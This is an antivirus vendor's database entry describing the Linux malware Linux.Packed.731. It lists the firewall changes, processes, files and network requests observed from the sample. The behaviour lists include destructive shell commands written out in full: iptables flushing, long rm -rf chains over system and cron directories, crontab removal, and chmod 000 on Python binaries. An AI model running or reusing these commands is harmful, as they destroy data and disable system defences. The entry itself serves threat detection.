Pour le fonctionnement correct du site, vous devez activer JavaScript dans votre navigateur.
Linux.Packed.731
Added to the Dr.Web virus database:
2020-02-25
Virus description added:
2020-02-25
Technical Information
Malicious functions:
Launches itself as a daemon
Substitutes application name for:
Modifies firewall settings:
iptables -I INPUT -s 178.170.189.0/24 -j DROP
iptables -F
iptables -I INPUT -s 91.215.168.0/22 -j DROP
iptables -I INPUT -s 45.141.84.0/22 -j DROP
iptables -A FORWARD -p udp --dport 53 -m string --algo kmp --string pastebin.com -j DROP
Manages services:
systemctl stop systemd-timesyncd
Launches processes:
sh -c rm -rf /tmp/.* ; rm -rf /tmp/* ; crontab -r ; for i in `atq | awk '{print $1}'`; do atrm $i; done ; chattr -R -i /tmp/* ; rm -rf /tmp/.* ; rm -rf /dev/shm/* ; rm -rf /dev/shm/* ; rm -rf /var/tmp/* ; rm -rf /var/tmp/.* ; rm -rf /etc/sysupdate ; rm -rf /etc/sysguard ; rm -rf /etc/update.sh ; rm -rf /etc/networkservice ; rm -rf /etc/sysr.sh ; rm -rf /etc/syscb ; rm -rf /etc/sysnpmc ; rm -rf /etc/httpdz ; rm -rf /etc/hos* ; rm -rf /etc/migrations ; rm -rf /etc/initdz ; >/dev/null 2>/dev/null
rm -rf /tmp/. /tmp/.. /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix
sh -c rm -rf /etc/hos* ; crontab -r ; rm -rf /bin/.ht* ; rm -rf /usr/bin/.sshd* ; rm -rf /bin/.sysl* ; rm -rf /etc/sta* ; rm -rf /usr/sbin/crond ; chmod 000 /usr/bin/py* ; rm -rf /home/*/.ss*/.kn* ; rm -rf /root/.ss*/.kn* ; rm -rf /var/spool/cr*/* ; rm -rf /etc/cron.*/* ; rm -rf /var/spool/anacro*/*/* ; rm -rf /root/.ba* ; rm -rf /lib64/liblzma* ; rm -rf /lib64/libaio* ; rm -rf /usr/sbin/rpcio* ; rm -rf /usr/sbin/config.* ; >/dev/null 2>/dev/null
sh -c systemctl stop systemd-timesyncd ; systemctl disable systemd-timesyncd ; >/dev/null 2>/dev/null
sh -c iptables -F ; iptables-save ; >/dev/null 2>&1
sh -c
rm -rf /etc/host.conf /etc/hostname /etc/hosts /etc/hosts.allow /etc/hosts.deny
crontab -r
rm -rf /bin/.ht*
rm -rf /usr/bin/.sshd*
sh -c echo \"nameserver 8.8.8.8\" >> /etc/resolv.conf ; >/dev/null 2>&1
rm -rf /bin/.sysl*
rm -rf /etc/staff-group-for-usr-local
rm -rf /usr/sbin/crond
iptables-save
chmod 000 /usr/bin/py3clean /usr/bin/py3compile /usr/bin/py3versions /usr/bin/pybuild /usr/bin/pyclean /usr/bin/pycompile /usr/bin/pydoc /usr/bin/pydoc2.7 /usr/bin/pydoc3 /usr/bin/pydoc3.4 /usr/bin/pygettext /usr/bin/pygettext2.7 /usr/bin/pygettext3 /usr/bin/pygettext3.4 /usr/bin/pygmentize /usr/bin/python /usr/bin/python-config /usr/bin/python2 /usr/bin/python2-config /usr/bin/python2.7 /usr/bin/python2.7-config /usr/bin/python3 /usr/bin/python3.4 /usr/bin/python3.4m /usr/bin/python3m /usr/bin/pythontex /usr/bin/pythontex3 /usr/bin/pyversions
sh -c /root/glfbfn
sh -c /root/mwoton
/root/mwoton
sh -c crontab -r ; rm -rf $HOME/.* ; rm -rf /var/run/* ; rm -rf /home/je*/.ba* ; rm -rf ../temp/* ; rm -rf ../logs/* ; rm -rf temp/* ; rm -rf logs/* ; rm -rf /dev/shm/* ; rm -rf /tmp/.* ; rm -rf /tmp/* ; chattr -R -i /tmp/* ; chattr -R -i /etc/cro*/* ; rm -rf /etc/cro*/* ; rm -rf /tmp/.* ; rm -rf /dev/shm/* ; rm -rf /dev/shm/* ; rm -rf /usr/local/sbin/* ; rm -rf /var/tmp/* ; rm -rf /etc/sys* ; rm -rf /var/tmp/.* ; chattr -R -i /var/spool/*/* ; rm -rf /etc/rc.d/init.d/kw* ; rm -rf /var/spool/*/*/* ; >/dev/null 2>/dev/null
rm -rf /root/. /root/.. /root/.bash_history /root/.bashrc /root/.profile
Kills system processes:
Kills the following processes:
run.sh
bash
(sd-pam)
acpid
cron
systemd
<SAMPLE>
/bin/sh
/bin/chmod
systemd-logind
systemd-journal
kworker/u2:1
systemd-cgroups
Performs operations with the file system:
Modifies file access rights:
/usr/bin/wget
/dev/urandom
/usr/bin/perl
/usr/bin/python3.4
/usr/bin/python2.7
/usr/bin/mawk
/usr/bin/xargs
/bin/sed
/usr/bin/crontab
/usr/bin/py3clean
/usr/bin/py3compile
/usr/share/python3/py3versions.py
/usr/share/dh-python/pybuild
/usr/bin/pyclean
/usr/bin/pycompile
/usr/bin/pydoc2.7
/usr/bin/pydoc3.4
/usr/bin/pygettext2.7
/usr/bin/pygettext3.4
/usr/bin/pygmentize
/usr/bin/x86_64-linux-gnu-python2.7-config
/usr/bin/python3.4m
/root/glfbfn
/usr/local/sbin
/usr/local/bin
/root/mwoton
Creates folders:
/var/tmp/kinsing
/tmp/hehe
/tmp/.db
/tmp/.soloc
/var/tmp/.soloc
/tmp/.ICEd-unix
/tmp/kdevtmpfsi
/var/tmp/kdevtmpfsi
Deletes folders:
/usr/local/sbin/
/usr/local/bin/
/var/spool/cron/
Creates or modifies files:
/etc/resolv.conf
/root/glfbfn
/root/mwoton
/root/nwkl
Deletes files:
/etc/host.conf
/etc/hostname
/etc/hosts
/etc/hosts.allow
/etc/hosts.deny
/bin/.ht*
/usr/bin/.sshd*
/bin/.sysl*
/etc/staff-group-for-usr-local
/usr/sbin/crond
/usr/bin/perl
/root/.bash_history
Network activity:
Establishes connection:
HTTP GET requests:
16#.###.104.230/c/cf
19#.###.53.225/c/dkkkr
Recommandations pour le traitement
Linux
Version démo gratuite
Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)
Téléchargez Dr.Web pour Android
Gratuit pour 3 mois
Tous les composants de protection
Renouvellement de la démo via AppGallery/Google Pay
Nous utilisons des cookies sur notre site web à des fins uniques d’analyse de la fréquentation et de récolte de données statistiques. En naviguant sur notre site, vous pouvez accepter ou refuser l’utilisation de ces fichiers cookies.
En savoir plus : Politique de confidentialité
Accepter
Refuser